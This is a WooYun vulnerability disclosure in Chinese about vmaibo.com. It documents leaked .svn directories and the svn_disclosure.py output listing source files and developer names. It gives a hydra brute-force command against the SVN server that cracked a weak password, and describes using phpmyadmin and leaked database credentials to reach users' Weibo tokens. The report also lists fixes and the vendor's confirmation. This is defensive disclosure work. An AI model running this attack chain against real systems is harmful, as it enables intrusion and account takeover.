当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036894

漏洞标题:敏感信息泄露系列#2 开发运维管理不当可导致微博大V被控制

相关厂商:vmaibo.com

漏洞作者: 猪猪侠

提交时间:2013-09-12 19:29

修复时间:2013-10-27 19:30

公开时间:2013-10-27 19:30

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-09-12: 细节已通知厂商并且等待厂商处理中
2013-09-13: 厂商已经确认,细节仅向厂商公开
2013-09-23: 细节向核心白帽子及相关领域专家公开
2013-10-03: 细节向普通白帽子公开
2013-10-13: 细节向实习白帽子公开
2013-10-27: 细节向公众公开

简要描述:

有时候,一个微不足道的信息泄露问题就能造成整个企业安全的崩盘
过去几年中,安全领域在如何处理自身漏洞的评估方面取得了长足的进步,几乎每个企业或个人都越来越多地依托第三方系统来运营自身业务,第三方系统被入侵的同时也将导致相关企业威胁增加。
#安全需要顾全整体#
http://www.wooyun.org/bugs/wooyun-2013-032750 续集!

详细说明:

#1 检测发现vmaibo所有业务系统都存在SVN信息泄露
http://www.vmaibo.com/.svn/entries
http://biz.vmaibo.com/.svn/entries
http://read.vmaibo.com/.svn/entries

svn_disclosure.py http://vmaibo.com /
*****************************************************
* Fetching: http://vmaibo.com
* mkdir vmaibo.com
* svn://127.0.0.1:3396/vmaibo-person
* svn://127.0.0.1:3396
*****************************************************
/Lang
/Conf
FILE: jsversons.php
FILE: routes.php
FILE: config-dev.php
FILE: config-release.php
/upgrade
FILE: 360_update_file.php
FILE: 360_update_file2.php
FILE: wb_recommend_user.php
FILE: wb_recommend_user_delete.php
FILE: update_table_data.php
FILE: insert_competitor_data.php
FILE: 360_add_table.php
/Common
FILE: common.php
/contact
FILE: index.php
/Tpl
FILE: layout.html
FILE: dispatch_jump.tpl
FILE: think_exception.tpl
/Tpl/Timer
FILE: repost.html
FILE: history.html
FILE: index_bak.html
FILE: index.html
/Tpl/Using
FILE: index.html
/Tpl/Fans
FILE: default.html
FILE: index.html
/Tpl/Material
FILE: index.html
FILE: add.html
/Tpl/Service
FILE: integrate.html
FILE: weibo.html
FILE: index.html
/Tpl/Customer
FILE: first_page.html
FILE: index.html
/Tpl/Comment
FILE: index.html
FILE: setReply.html
/Tpl/Track
FILE: index.html
/Tpl/Attention
FILE: index.html
/Tpl/Permition
FILE: none.html
/Tpl/Sentiment
FILE: detonate.html
FILE: index.html
/Tpl/Messages
FILE: comment.html
FILE: comment2.html
FILE: index.html
/Tpl/Member
FILE: auth.html
FILE: agreement.html
FILE: join_ok.html
/Tpl/Index
FILE: main-bak.html
FILE: main.html
FILE: index.html
/Tpl/Recommend
FILE: indexcomment2.html
FILE: tencent_category.html
FILE: other_bak.html
FILE: other_category.html
FILE: tencent.html
FILE: other.html
FILE: index.html
FILE: indextezhu.html
FILE: indexsfx.html
FILE: index2.html
FILE: indexcomment.html
/Tpl/Besiness
FILE: index.html
/Tpl/Tool
FILE: index.html
/Tpl/Public
FILE: footer.html
FILE: left_menu.html
FILE: header.html
FILE: left_menu-bk.html
FILE: cookie.js
FILE: ContentState.js
FILE: left_menu.js
FILE: Teaching.js
FILE: kingwolfofsky.js
FILE: atUser.js
/Tpl/Public/js
/script
FILE: clean_detonated.php
FILE: kaifu.php
/script/log
/Lib
/Public
*****************************************************
Author: xlxi
Author: xm
Author: zhouli
Author: ygli
Author: fqwang
Author: xxl
*****************************************************


# 微博名人版

svn_disclosure.py http://read.vmaibo.com /
*****************************************************
* Fetching: http://read.vmaibo.com
* mkdir read.vmaibo.com
* svn://219.239.***.*:3396/vmaibo-read
* svn://219.239.***.*:3396
*****************************************************
/Test
FILE: Test.php
/Lang
/Runtime
/Conf
FILE: jsversons.php
FILE: authuser.php
FILE: routes.php
/upgrade
/scripts
FILE: talk.php
FILE: timer_pid.php
FILE: timer.php
FILE: config.php
/scripts/log
/scripts/plugin
FILE: Sina.class.php
/Common
FILE: common.php
/manage
FILE: index.php
/manage/My97DatePicker
FILE: config.js
FILE: calendar.js
FILE: My97DatePicker.htm
FILE: WdatePicker.js
FILE: zh-cn.js
/manage/My97DatePicker/lang
FILE: datePicker.gif
FILE: Thumbs.db
FILE: WdatePicker.css
/manage/My97DatePicker/skin
/manage/conf
FILE: driver.php
FILE: config.php
/manage/lib
FILE: ActionBase.class.php
FILE: Page.class.php
FILE: Helper.class.php
/manage/template
FILE: talk_audit.js
FILE: index.php
/manage/action
FILE: TalkAudit.class.php
/Tpl
/Lib
/Data
/Api
FILE: index.php
/Api/conf
FILE: config.php
/Api/modules
FILE: show_user.php
FILE: status_counts.php
FILE: daily_trends.php
FILE: repost_timeline.php
FILE: shorten.php
FILE: show_status.php
FILE: user_timeline.php
FILE: trends_timeline.php
FILE: get_comments_by_mid.php
FILE: status_search.php
/Api/libs
FILE: callback.php
FILE: config.php
FILE: weibooauth.php
FILE: index.php
FILE: success.php
/Public
*****************************************************
Author: xlxi
Author: fqwang
Author: ygli
*****************************************************


#2 通过SVN泄露的信息,间接利用
通过泄露的信息得知SVN服务器的物理真是地址,219.239.***.*,结合已经获取到的author信息,构造弱口令字典,进行自动化暴力猜解。

Author: xlxi
Author: fqwang
Author: ygli
Author: xlxi
Author: xm
Author: zhouli
Author: xxl


./hydra -L vmaibo_user.txt -P vmaibo_pass.txt 219.239.***.* Subversion
成功爆破出fqwang用户弱口令fqwang + 2013
#3 通过SVN check 开发版本源码

svn_checkout.jpg


.jpg


漏洞证明:

# 脉搏网自带phpmyadmin功能,通过源码目录找到的数据库密码连接
http://read.vmaibo.com/phpmyadmin/
http://www.vmaibo.com/phpmyadmin/

weibo_利用_token.jpg


# 后台地址
http://adm.vmaibo.com/login
# 间接利用,可以直接获取到李开复同学的微博TOKEN
受影响的大V如下:http://www.vmaibo.com/using

.jpg

修复方案:

#1 删除掉svn泄露地址
#2 重命名phpmyadmin地址
#3 svn服务端管理端口不对外开放

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-09-13 15:38

厂商回复:

感谢提出漏洞,我们已经着手处理了,并且正在进行安全处理,感谢猪猪侠!

最新状态:

暂无